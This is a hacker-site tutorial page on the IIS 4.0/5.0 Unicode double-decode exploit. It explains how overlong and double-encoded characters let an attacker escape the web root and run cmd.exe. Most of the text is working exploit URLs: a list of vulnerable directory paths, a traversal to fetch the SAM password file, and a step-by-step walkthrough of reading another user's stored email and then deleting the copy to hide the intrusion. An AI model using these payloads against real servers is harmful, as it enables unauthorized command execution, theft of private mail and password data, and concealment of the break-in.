dslogo1.gif

Exploiting IIS unicode Exploit
Home
Tutorials
Password Crackers
Dictionary/Word Lists
Unix
Encryption
Port Scanners
Privacy/Anonymity
Trojans
Contact/About Me
The Lighter Side
Proxy Servers
Password Managers
Anti-Trojan/Virus
Personal Firewalls
Anti-Spyware
Secure File Deletion
Internet Cleanup Tools
PC Access Control
System Utilities
Email Security
Instant Messengers
Virus Creation Software
IRC
Web Development
Digital Soldier M.A.M.E
Digital Soldier Wallpaper
Digital Soldier Emulation
Digital Soldier Javascripts
Digital Soldier Games Spot

Unicode extensions are installed by default with Microsoft Internet Information
Server (IIS) version 4.0 and 5.0. This is to allow characters that are not used
in the English language to be recognized by web servers. As we know computers
just deal with numbers. It stores letters and other characters by assigning a
number for each one. Unicode provides a unique number for every character.
Unicode forms a single character set across all languages. It's a standard
2-byte or 3-byte character set. The IIS Unicode Exploit allows users to run
arbitrary commands on the web server. IIS servers with the Unicode extensions
loaded are vulnerable unless they are running current patches.

When can this exploit be used?

1. A writeable or executable directory is available; allowing attackers to
upload malicious code.
2. A system executable such as cmd.exe is available on the root and doesn't have
an access control list applied to it.

Now I'll explain you in details how this technique can be used exploiting
servers.
The attack occur when an attacker sends a malformed URL to a web server that
looks something like this:
http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

TARGET has a virtual executable directory e.g. scripts, that is located on the
same driver of Windows system. The directory of C:\ will be revealed! You must
be wondering what these %255c are ? Well... go on reading I have explained it
later in this article.

http://www.somesite.com/../../../../../winnt/repair/sam._
This one is simple to understand; the web server will just look for the file in
the web root directory called "../../../../../winnt/repair/sam._". The '../'
tells the web server to look up one directory , so five '../''s in a row will
make the web server look in the document root for a file called
winnt/repair/sam._. The no. of '../''s does not matter as long as as there are
enough of them to recourse back to the root of the file system (either c:\ or /
on Unix system)

The IIS Unicode exploit uses the HTTP protocol and malformed URLs to traverse
directories and execute arbitrary commands on the vulnerable web servers. The
IIS Unicode exploit uses a Unicode representation of a directory delimiter ( / )
to fool IIS . Because the exploit uses http, it works right from the address bar
of a browser. Because of the non-interactive nature of this exploit, interactive
commands such as ftp & telnet don't work very well. We will see later how it is
possible to run commands interactively using this exploit.

Example of Unicode exploit using a web browser. Note that the output of the
command dir c:\ is displayed :

Directory of C:\

10/24/2002 01:10p Documents and Settings
10/24/2002 03:45p WinNT
10/25/2002 02:21p Inetpub
10/29/2002 07:05a Program Files
11/01/2002 10:20a temp
11/01/2002 11:55a WebLogs
11/10/2002 01:00p SQL
11/11/2002 09:45a webstats.txt
11/11/2002 11:11a Lucky System
11/12/2002 10:23a WINNT
11/15/2002 09:30a Mail

1 File(s) 3,244,232 Bytes
10 Dir(s) 635,474,212 bytes free

Lets go into details....
Say the IP address of my site www.whothehellknows.com is 202.232.54.20 and is
running IIS
To understand the actual attack we will closely examine a sample of the exploit.

http://202.232.54.20/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
We notice that the URL calls something from the /scripts directory on the server
www.whothehellknows.com For this particular version of exploit the scripts
directory must exist and the path to the executable cmd.exe must be correct.
The next this we see is ..%c0%af. This string of characters "%c0%af" is an
overlong Unicode representation for ' / '. If this Unicode exploit is loaded on
the server, the URL will be interpreted to be:

http://202.232.54.20/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\
The URL backs out of the web root, to the root directory of the server, then
calls winnt\system32\cmd.exe. We are using the command interpreter (cmd.exe) to
execute the command 'dir c:\' You can also try running other commands like ping,
netstat, traceroute ...etc.

[Note: Ahh... You ever thought why this exploit occurs ? Well it occurs because
the CGI routine within the web server decodes the address twice. First CGI
filename will be decoded to check if it is an executable file ( e.g '.exe' or
'.com') After the filename checkup , IIS will run another decode process. If you
haven't got it, you will understand it later ...just read on :) ]. We will find
that substituting a / for the %c0%af will result in a '404' error on the web
server. Thus we can say that IIS checks the path before interpreting the Unicode
/.

In the above URL, "?" after cmd.exe means argument. In the example given above:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ the
argument is /c which means it carries out the command specified by string and
then terminates. There are many other arguments. Just do cmd.exe/? at your dos
prompt. The "+" indicates the space between arguments.

/..%255c..%255c This decodes to /..\..\ what we are trying to do here is perform
directory traversal.
If you know anything about Hexadecimal then you would realise that we are
sending a hex value to the server. Just like %20 means space. So we know now
that we need to send hex value , we need to send a \ . Looking at hexadecimal
table you will find that \ is %5c . You might be thinking that if you can use
%5c instead of \ but we cannot because this is checked by IIS and it would mean
that someone is trying to perform directory traversal upon the server. IIS
denies the user access. But luckily it gets checked twice so if we send various
hex values of %, 5, and c we should get \ in return. Using hex table we find
that

% = %25
5 = %35
c = %63
We do not need to send a hex value for each value of %5c.. just as long as we
finish up with %5c we will be fine. Now that we know the hex value we can put
them together to get the %5c as required. Let me give you some examples so that
it's clear to you.

Combinations                  Break down of combinations
------------                  --------------------------
%255c                         %25 = %; 5 = 5; c = c ==> %5c
%%35c                         % = %; %35 = 5; c = c ==> %5c
%%35%63                       % = %; %35 = 5; %63 = c ==> %5c
%25%35%63                     %25 = %; %35 = 5; %63 = c ==> %5c

Thereby '..\' can be represented by '..%255c' , '..%%35c' etc. After first
decoding, '..%255c' is turned into '..%5c' IIS will take it as legal character
string that can pass security checkup. But after a second decode process, it
will be reverted to '..\' . Hmm... now you understand ?? I'm sure you know why
I'm asking this :) Hint: twice decode.

There are *many* vulnerabilities with IIS but I'm going to discuss few :
http://IP ADDRESS/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Recall/see again the example I gave you earlier - the output of the command 'dir
c:\' shown in the web browser.
To navigate just change the links to /system32/cmd.exe?/c+dir+c:\Inetpub to
navigate Inetpub directory.
Say there is mail system at my site and under Mail directory there are
subdirectories :
username_whothehellknows.com\inbox\
Under inbox directory there are many .eml files which you want to read. Lets
assume username is lucky and the eml file be 05215ac98el136b61450dle8b2.eml So
what are we waiting for ? Lets read the mail ! ( ohh ! I must delete all my gf's
email ! LOL ) What I did is gave the full path to that eml file:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\Mail\mail_whothehellknows.com\inbox\05215ac98el136b61450dle8b2.eml
The output I got is:

Showing Directory of c:\Mail\mail_whothehellknows.com\inbox\
10/10/2002 07:58a 2,244 05215ac98el136b61450dle8b2.eml
1 File(s) 2,244 bytes
0 Dir(s) 23,234,544,239 bytes free
I even downloaded the eml file by using a download manager , then changed it to
.txt , but this also didn't help , I got the same thing.. This means you cannot
read these files directly . So what we do is copy the eml file to c:\ of the web
server named as mail.txt . We write it as:

http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\mail_whothehellknows\inbox\05215ac98el136b61450dle8b2.eml+mail.txt

This also didn't work !! Do you know why ? how can you access such a long eml
file from command prompt ?? First get the DOS 8.3 format . For that give
\Mail\mail_whothehellknows\inbox\/x note-> /x gives you the file names in 8.3
format. Again
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\mail_whothehellknows\inbox\/x
We get the file name as 05215A~1.EML
Now ,
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\mail_whothehellknows\inbox\05215A~1.EML+mail.txt
We Get :

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
1 file(s) copied

Voila!!! we got it! we have copied the mail.txt to c:\
just using simply
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+type+c:\mail.txt
Now you can see the contains of it :)
Remember to delete the file after reading
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+c:\mail.txt
You can try out simple commands like this. I hope you got the idea !

The basic Unicode commands are:

- dir : list a directory
- dir/x : list it in dos form ~ (8.3)
- call : starts a exe
- start : starts a exe
- del : deletes a file
- type : view files
- copy : copies a file
- /c : sends the commands to a shell that terminates upon completion.
- /s : show the results
- /S : do a research
- /h : run a file in hidden mode
- echo : it orders to write the commands in a textual file.


_______________________________________________________________________
IG (C) 2003 and Foreva
All rights worth a Invisible Ghost
Copy this and we will come for you